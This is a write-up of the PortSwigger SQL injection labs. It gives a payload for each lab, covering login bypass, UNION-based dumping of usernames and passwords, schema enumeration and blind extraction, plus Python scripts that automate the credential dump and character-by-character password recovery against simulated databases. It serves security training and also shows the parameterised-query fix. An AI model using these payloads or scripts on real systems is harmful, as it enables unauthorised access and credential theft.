SQL Injection Labs with Use Cases and Solutions
This post walks through the SQL injection labs provided by PortSwigger (Web Security Academy), giving the payload for each lab and a short explanation of why it works.
SQL is the language used to query and manipulate data in relational databases, and most web applications build SQL queries from user input. SQL injection happens when that input is concatenated straight into the query text, so characters such as a single quote, a comment sequence (-- or #) or a keyword like UNION change the structure of the query instead of being treated as data. The fix is not string "sanitization": use parameterized queries (prepared statements) so the database receives the query text and the values separately; input validation is only a secondary defence.
A successful injection lets the attacker read data the application never meant to expose (credentials, credit card details, personal data) and, depending on the query, modify or delete rows. SQL injection is a significant danger to web applications because it leads to data loss, financial damage and harm to a company's reputation.
SQL injection turns up constantly in CTFs and bug bounty reports.
It is such a widely used entry point for web attacks that it sits in the OWASP Top 10 under the Injection category.
To make this easier to follow, let's solve the labs one by one!
Lab: SQL injection vulnerability in WHERE clause allowing retrieval of hidden data. Let's access the lab.
Step-1 This is the basic lab, so a basic payload is enough. The product filter takes its category from the category parameter of the /filter request and builds a query of the form SELECT * FROM products WHERE category = 'Gifts' AND released = 1. Give the category parameter the value 'OR+1=1-- (the + is a URL-encoded space): the single quote closes the string, OR 1=1 makes the WHERE clause always true, and -- comments out the rest of the query, including the released = 1 check, so the unreleased products are returned as well.
Step-2 Now just submit the request.
Lab is solved.
Lab: SQL injection vulnerability allowing login bypass. Use Burp Suite to intercept and modify the login request. Modify the username parameter, giving it the value: administrator'-- The quote closes the username string and -- comments out the AND password = '...' part of the query, so the login succeeds as administrator without the password being checked at all.
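To see exactly why administrator'-- works, here is the vulnerable login pattern next to its parameterised fix. This is an added example written for this post, not code from PortSwigger or from the lab; the in-memory SQLite database, the users table and the credentials in it are constructed stand-ins, and the function names login_vulnerable and login_fixed are hypothetical.

```python
import sqlite3

# Constructed stand-in for the lab's users table (hypothetical credentials).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("administrator", "admin-pass-xyz"), ("wiener", "peter")])
    return conn

def login_vulnerable(conn, username, password):
    """The pattern behind the lab: user input is pasted straight into the SQL text."""
    sql = (f"SELECT username FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None

def login_fixed(conn, username, password):
    """Parameterised query: the driver sends the SQL text and the values
    separately, so a quote or a -- in the input is just data, not syntax."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None

if __name__ == "__main__":
    db = make_db()
    # With administrator'-- the WHERE clause becomes
    #   username = 'administrator'--' AND password = 'anything'
    # and everything after -- is a comment, so the password check vanishes.
    print(login_vulnerable(db, "administrator'--", "anything"))  # administrator
    print(login_fixed(db, "administrator'--", "anything"))       # None
    print(login_fixed(db, "wiener", "peter"))                    # wiener
```

The fixed version does not reject or escape the quote; it simply never lets the input become part of the SQL text, which is why parameterised queries are the defence and not input filtering.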
Lab: SQL injection UNION attack, determining the number of columns returned by the query. Let's access the lab.
Step-1 Intercept the request that sets the product category filter and modify it.
Step-2 A UNION SELECT only works when it returns the same number of columns as the original query, so we start with one: '+UNION+SELECT+NULL-- (NULL is used because it is compatible with every column type). We can observe that the server answers with an HTTP 500 error.
Step-3 Modify the category parameter to add an additional column containing a null value: '+UNION+SELECT+NULL,NULL--
Step-4 Continue adding null values until the error disappears and the response includes an additional row containing the null values. The number of NULLs at that point is the number of columns returned by the query.
And the lab is solved!
Lab: SQL injection UNION attack, finding a column containing text. Let's access the lab.
Step-1 Use Burp Suite to intercept and modify the request that sets the product category filter.
Step-2 First determine the number of columns with the NULL technique, i.e. '+UNION+SELECT+NULL,NULL,NULL-- Then place a string literal in one position at a time to find out which column accepts text, e.g. '+UNION+SELECT+'abcdef',NULL,NULL-- A position that is not text-compatible produces an error; a position that is shows the string in the response.
Step-3 Here we used the payload '+UNION+SELECT+NULL,'yHYG9p',NULL-- (the lab tells you which random string to use). It also shows that the query returns three columns and that the second one contains text.
Lab is solved.
Lab: SQL injection UNION attack, retrieving data from other tables. Let's access the lab; it clearly states that the database contains a table called users, with columns named username and password.
Step-1 Use Burp Suite to intercept and modify the request that sets the product category filter.
Step-2 Determine the number of columns that are being returned by the query and which columns contain text data. Verify that the query is returning two columns, both of which contain text, using a payload like the following in the category parameter:
'+UNION+SELECT+'abc','def'--
Step-3 Use the following payload to retrieve the contents of the users table: '+UNION+SELECT+username,+password+FROM+users--
Scroll down a little and the usernames and passwords appear in the product list; log in as administrator with the recovered password to solve the lab.
Lab: SQL injection UNION attack, retrieving multiple values in a single column. Let's access the lab.
Step-1 Use Burp Suite to intercept and modify the request that sets the product category filter.
Step-2 Determine the number of columns that are being returned by the query and which columns contain text data. Verify that the query is returning two columns, only one of which contains text, using a payload like the following in the category parameter: '+UNION+SELECT+NULL,'abc'--
Step-3 With only one usable text column, concatenate both values into it. Use the following payload to retrieve the contents of the users table: '+UNION+SELECT+NULL,username||'~'||password+FROM+users-- Here || is the string concatenation operator (PostgreSQL and Oracle; on MySQL you would use CONCAT()) and ~ is just a separator so the two values can be split apart again.
Verify that the application's response contains usernames and passwords.
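The four UNION labs above are one procedure: find the column count with NULLs, find which position accepts text with a marker string, then pull the target data through that position (joined with || when only one text column is available). The script below automates that procedure against a simulated vulnerable product filter. It is an added example written for this post, not PortSwigger's code or the lab's own source; the SQLite database, its products and users tables, the credentials, and the function names vulnerable_filter, find_column_count, find_text_columns and dump_users are all constructed for the demonstration. One assumption is marked in the code: SQLite is loosely typed, so the "text in a numeric column" error that PostgreSQL or Oracle would raise is imitated at the rendering layer.

```python
import sqlite3

# Constructed stand-in for the lab's database (hypothetical products and users).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (name TEXT, category TEXT, price REAL)")
    conn.executemany("INSERT INTO products VALUES (?, ?, ?)",
                     [("Gift Box", "Gifts", 12.5), ("Mug", "Gifts", 8.0),
                      ("Pet Toy", "Pets", 5.25)])
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("administrator", "s3cr3t-admin-pass"), ("wiener", "peter")])
    return conn

def vulnerable_filter(conn, category):
    """Simulates the lab's product filter: the category is concatenated into
    the query and the rows are rendered one per line as 'name | price'.
    Assumption: SQLite is loosely typed, so to mimic the type-mismatch error a
    real database raises when text lands in a numeric UNION column, the
    renderer formats the price as a number and any non-numeric value there
    turns into an HTTP 500."""
    sql = f"SELECT name, price FROM products WHERE category = '{category}'"
    try:
        lines = []
        for name, price in conn.execute(sql).fetchall():
            price_text = "" if price is None else f"{price:.2f}"
            lines.append(f"{name or ''} | {price_text}")
        return 200, "\n".join(lines)
    except (sqlite3.Error, TypeError, ValueError):
        return 500, "Internal Server Error"

def find_column_count(send, max_cols=10):
    """Column-count lab: add NULLs until the UNION stops erroring."""
    for n in range(1, max_cols + 1):
        status, _ = send("' UNION SELECT " + ",".join(["NULL"] * n) + "--")
        if status == 200:
            return n
    raise RuntimeError("column count not found")

def find_text_columns(send, ncols, marker="yHYG9p"):
    """Text-column lab: put a marker string in each position in turn; the
    positions that echo it back without an error accept text."""
    text_cols = []
    for i in range(ncols):
        cols = ["NULL"] * ncols
        cols[i] = f"'{marker}'"
        status, body = send("' UNION SELECT " + ",".join(cols) + "--")
        if status == 200 and marker in body:
            text_cols.append(i)
    return text_cols

def dump_users(send, ncols, text_col, sep="~"):
    """Data-retrieval labs: pull username and password through one text column,
    joined with || and a separator, then split them apart again."""
    cols = ["NULL"] * ncols
    cols[text_col] = f"username||'{sep}'||password"
    _, body = send("' UNION SELECT " + ",".join(cols) + " FROM users--")
    creds = {}
    for line in body.splitlines():
        field = line.split(" | ")[text_col]   # rendered columns keep query order
        if sep in field:
            user, pw = field.split(sep, 1)
            creds[user] = pw
    return creds

if __name__ == "__main__":
    db = make_db()
    send = lambda payload: vulnerable_filter(db, payload)
    n = find_column_count(send)          # 2
    text = find_text_columns(send, n)    # [0]
    print(n, text, dump_users(send, n, text[0]))
```

Against a real target, send would be a function that puts the payload into the category parameter (URL-encoded, so spaces become +) and returns the status code and body; the three attack functions do not change.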
Lab: SQL injection attack, querying the database type and version on Oracle. Let's access the lab.
Step-1 Use Burp Suite to intercept and modify the request that sets the product category filter.
Step-2 On Oracle every SELECT needs a FROM clause, so the probes use the built-in one-row table dual. Determine the number of columns that are being returned by the query and which columns accept text, using a payload like the following in the category parameter: '+UNION+SELECT+NULL,'def'+FROM+dual-- This confirms that there are two columns and that the second one accepts text; test the first position the same way, because the next payload puts text there.
Step-3 Use the following payload to display the database version: '+UNION+SELECT+BANNER,+NULL+FROM+v$version-- If only the second column accepts text, swap the positions to NULL,BANNER.
Lab: SQL injection attack, querying the database type and version on MySQL and Microsoft. Let's access the lab.
Step-1 Use Burp Suite to intercept and modify the request that sets the product category filter.
Step-2 Let's first try the usual comment syntax and see whether we get an error: '+UNION+SELECT+'abc','def'-- On MySQL the -- comment sequence must be followed by a space (it would have to be URL-encoded as --+ or --%20), which is why this payload fails; the # comment character works without one.
Step-3 Determine the number of columns that are being returned by the query and which columns contain text data. Verify that the query is returning two columns, both of which contain text, using a payload like the following in the category parameter: '+UNION+SELECT+'abc','def'#
Step-4 Use the following payload to display the database version: '+UNION+SELECT+@@version,+NULL# (@@version is understood by both MySQL and Microsoft SQL Server.)
Lab: SQL injection attack, listing the database contents on non-Oracle databases. Let's access the lab.
Step-1 Use Burp Suite to intercept and modify the request that sets the product category filter.
Step-2 Determine the number of columns that are being returned by the query and which columns contain text data. Verify that the query is returning two columns, both of which contain text, using a payload like the following in the category parameter: '+UNION+SELECT+'abc','def'--
Step-3 Use the following payload to retrieve the list of tables in the database: '+UNION+SELECT+table_name,+NULL+FROM+information_schema.tables-- (information_schema exists on PostgreSQL, MySQL and Microsoft SQL Server, but not on Oracle.)
Find the name of the table containing user credentials. It is randomised per lab instance; in ours it was users_owumhh.
Step-4 Now that we know the table name, retrieve the names of its columns: '+UNION+SELECT+column_name,+NULL+FROM+information_schema.columns+WHERE+table_name='users_owumhh'--
Step-5 Use the following payload (replacing the table and column names with the ones you found) to retrieve the usernames and passwords for all users: '+UNION+SELECT+username_abcdef,+password_abcdef+FROM+users_abcdef-- Now just scroll down to find the username and password of administrator.
Lab: SQL injection attack, listing the database contents on Oracle. Let's access the lab.
Step-1 Use Burp Suite to intercept and modify the request that sets the product category filter.
Step-2 As Oracle requires a FROM clause in every SELECT, we use the built-in table dual to determine the number of columns and which ones contain text: '+UNION+SELECT+'abc','def'+FROM+dual--
Step-3 Now retrieve the list of tables in the database; Oracle has no information_schema, and all_tables is the equivalent: '+UNION+SELECT+table_name,NULL+FROM+all_tables-- Find the name of the table containing user credentials.
Step-4 Use the following payload (replacing the table name) to retrieve the details of the columns in the table: '+UNION+SELECT+column_name,NULL+FROM+all_tab_columns+WHERE+table_name='USERS_YAAYCQ'-- Note that Oracle stores unquoted identifiers in upper case, so the table name must be written in capitals here.
Step-5 Now replace the table and column names to retrieve the username and password for all users: '+UNION+SELECT+USERNAME_AUABTP,+PASSWORD_TWJHP3+FROM+USERS_YAAYCQ--
Use the administrator's username and password to log in.
Lab: Blind SQL injection with conditional responses.
Step-1 Visit the front page of the shop, and use Burp Suite to intercept and modify the request containing the TrackingId cookie. For simplicity, let's say the original value of the cookie is TrackingId=xyz. Nothing from the query is shown on the page; the only signal is whether the "Welcome back" message appears, which happens when the cookie lookup returns a row.
Step-2 Modify the TrackingId cookie, changing it to: TrackingId=xyz' AND '1'='1 Verify that the "Welcome back" message appears in the response.
Step-3 Now change it to: TrackingId=xyz' AND '1'='2 Verify that the "Welcome back" message does not appear in the response. This demonstrates how you can test a single boolean condition and infer the result.
Step-4 Now change it to: TrackingId=xyz' AND (SELECT 'a' FROM users LIMIT 1)='a Verify that the condition is true, confirming that there is a table called users.
Step-5 Now change it to: TrackingId=xyz' AND (SELECT 'a' FROM users WHERE username='administrator')='a Verify that the condition is true, confirming that there is a user called administrator.
Step-6 The next step is to determine how many characters are in the password of the administrator user. To do this, change the value to: TrackingId=xyz' AND (SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)>1)='a This condition should be true, confirming that the password is greater than 1 character in length.
Step-7 Send a series of follow-up values to test different password lengths. Send: TrackingId=xyz' AND (SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)>2)='a and keep increasing the number until the "Welcome back" message disappears.
This is quicker with Intruder: mark the number as the payload position, use a numbers payload from 1 to 50 and grep the responses for "Welcome back". The length turns out to be 20.
Step-8 Now extract the password one character at a time with a condition of the form: TrackingId=xyz' AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username='administrator')='a Use a cluster bomb Intruder attack over the position (1 to 20) and the candidate character (a-z and 0-9), again grepping for "Welcome back"; the combination that matches at each position gives that character.
Here is the password, and now we can solve the lab by logging in as administrator. Note: some screenshots are currently missing or were deleted; I will try to upload them in the future.
Lab: Blind SQL injection with conditional errors. Let's access the lab.
Step-1 Modify the TrackingId cookie, appending a single quotation mark to it: TrackingId=xyz'
Verify that an error message is received.
Step-2 Now change it to two quotation marks: TrackingId=xyz'' Verify that the error disappears. This suggests that a syntax error (in this case, the unclosed quotation mark) is having a detectable effect on the response.
Step-3 You now need to confirm that the server is interpreting the injection as a SQL query, i.e. that the error is a SQL syntax error as opposed to any other kind of error. To do this, you first need to construct a subquery using valid SQL syntax. Try submitting: TrackingId=xyz'||(SELECT '')||'
Step-4 In this case, notice that the query still appears to be invalid. This may be due to the database type, so try specifying a predictable table name in the query: TrackingId=xyz'||(SELECT '' FROM dual)||' As you no longer receive an error, the target is probably an Oracle database, which requires every SELECT statement to have a FROM clause (dual is Oracle's built-in one-row table for exactly this purpose).
Step-5 As long as you make sure to always inject syntactically valid SQL queries, you can use this error response to infer key information about the database. For example, in order to verify that the users table exists, send the following query: TrackingId=xyz'||(SELECT '' FROM users WHERE ROWNUM = 1)||' As this query does not return an error, you can infer that this table does exist. Note that the WHERE ROWNUM = 1 condition is important here to prevent the query from returning more than one row, which would break our concatenation.
Step-6 You can also exploit this behavior to test conditions. First, submit the following query: TrackingId=xyz'||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM dual)||' Verify that an error message is received.
Step-7 Now change it to: TrackingId=xyz'||(SELECT CASE WHEN (1=2) THEN TO_CHAR(1/0) ELSE '' END FROM dual)||' Verify that the error disappears. This demonstrates that you can trigger an error conditionally on the truth of a specific condition. The CASE expression tests a condition and evaluates to one expression if the condition is true, and another expression if the condition is false. The former expression contains a divide-by-zero, which causes an error. In this case, the two payloads test the conditions 1=1 and 1=2, and an error is received when the condition is true.
Step-8 Combine the CASE trick with a condition on the password. First find its length with TrackingId=xyz'||(SELECT CASE WHEN LENGTH(password)>1 THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||' increasing the number until the error stops. Then test one character at a time with TrackingId=xyz'||(SELECT CASE WHEN SUBSTR(password,1,1)='a' THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||' using Intruder over the position and the candidate character. Here an error response means the guess is correct, the opposite of the "Welcome back" lab. Log in as administrator with the recovered password.
Lab: Blind SQL injection with time delays. Let's access the lab.
Step-1 Visit the front page of the shop, and use Burp Suite to intercept and modify the request containing the TrackingId cookie.
Step-2 Modify the TrackingId cookie, changing it to: TrackingId=x'||pg_sleep(10)-- pg_sleep is a PostgreSQL function, and concatenating its result with || forces the database to evaluate it as part of the query.
Submit the request and observe that the application takes 10 seconds to respond. The delay is the only signal, and the lab is solved once it is observed; to extract data the same pg_sleep would be placed inside a CASE WHEN condition so that only true guesses delay the response.
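The three blind labs (conditional responses, conditional errors, time delays) share one extraction loop: an oracle that answers true or false for an injected condition, driven first over LENGTH(password)>N and then over one character at a time. The script below implements that loop against a simulated TrackingId lookup, using the "Welcome back" channel from the conditional-responses lab; the same extract_password function takes any oracle(condition) -> bool, so an error-driven or pg_sleep-driven oracle plugs in without changing the loop. This is an added example written for this post, not PortSwigger's code or the lab's own source. The SQLite database, the tracking and users tables, the password value and the function names vulnerable_tracking, boolean_oracle, admin_condition, find_password_length and extract_password are constructed for the demonstration; the simulation uses substr(), which SQLite and PostgreSQL both provide, where the lab solution writes SUBSTRING().

```python
import sqlite3
import string

CHARSET = string.ascii_lowercase + string.digits   # the lab passwords use [a-z0-9]

# Constructed stand-in for the lab's database (hypothetical tracking id and users).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tracking (trackingid TEXT)")
    conn.execute("INSERT INTO tracking VALUES ('xyz')")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("administrator", "q7m2x9kd0v1abc4ef5gh"), ("wiener", "peter")])
    return conn

def vulnerable_tracking(conn, cookie):
    """Simulates the lab: the TrackingId cookie is concatenated into a lookup
    and nothing from the query is displayed; the page only says 'Welcome back'
    when the lookup returns a row."""
    sql = f"SELECT trackingid FROM tracking WHERE trackingid = '{cookie}'"
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.Error:
        return "Internal Server Error"
    return "Welcome back!" if row else "Home"

def boolean_oracle(send, condition):
    """Conditional-responses oracle: True iff the injected SQL condition holds.
    `condition` must be a complete boolean expression such as '1'='1'."""
    return "Welcome back" in send(f"xyz' AND ({condition})--")

def admin_condition(predicate, user="administrator"):
    # Same shape as the lab's probes: the subquery yields 'a' only when the
    # predicate holds for that user, so the comparison with 'a' is the signal.
    return f"(SELECT 'a' FROM users WHERE username='{user}' AND {predicate})='a'"

def find_password_length(oracle, user="administrator", max_len=64):
    """Step through LENGTH(password)>N until the condition flips to false."""
    for n in range(1, max_len + 1):
        if not oracle(admin_condition(f"LENGTH(password)>{n}", user)):
            return n
    raise RuntimeError("password longer than max_len")

def extract_password(oracle, user="administrator"):
    """Recover the password one character at a time. substr(x, pos, 1) is the
    one-character slice (PostgreSQL also accepts SUBSTRING(x,pos,1) as in the
    lab). Any oracle(condition) -> bool works here: one driven by an error
    response or by a pg_sleep delay plugs into the same loop."""
    length = find_password_length(oracle, user)
    recovered = ""
    for pos in range(1, length + 1):
        for c in CHARSET:
            if oracle(admin_condition(f"substr(password,{pos},1)='{c}'", user)):
                recovered += c
                break
        else:
            raise RuntimeError(f"no candidate matched at position {pos}")
    return recovered

if __name__ == "__main__":
    db = make_db()
    send = lambda cookie: vulnerable_tracking(db, cookie)
    oracle = lambda cond: boolean_oracle(send, cond)
    print(find_password_length(oracle))   # 20
    print(extract_password(oracle))       # q7m2x9kd0v1abc4ef5gh
```

Against the real labs, send would set the TrackingId cookie on an HTTP request and return the response body; for the conditional-errors lab the oracle would check for an error response instead of "Welcome back", and for the time-delay lab it would time the request. A linear scan of 36 candidates per position is what Intruder does too; a binary search on the character code (for example with ASCII()) would cut the request count by about five times when latency matters.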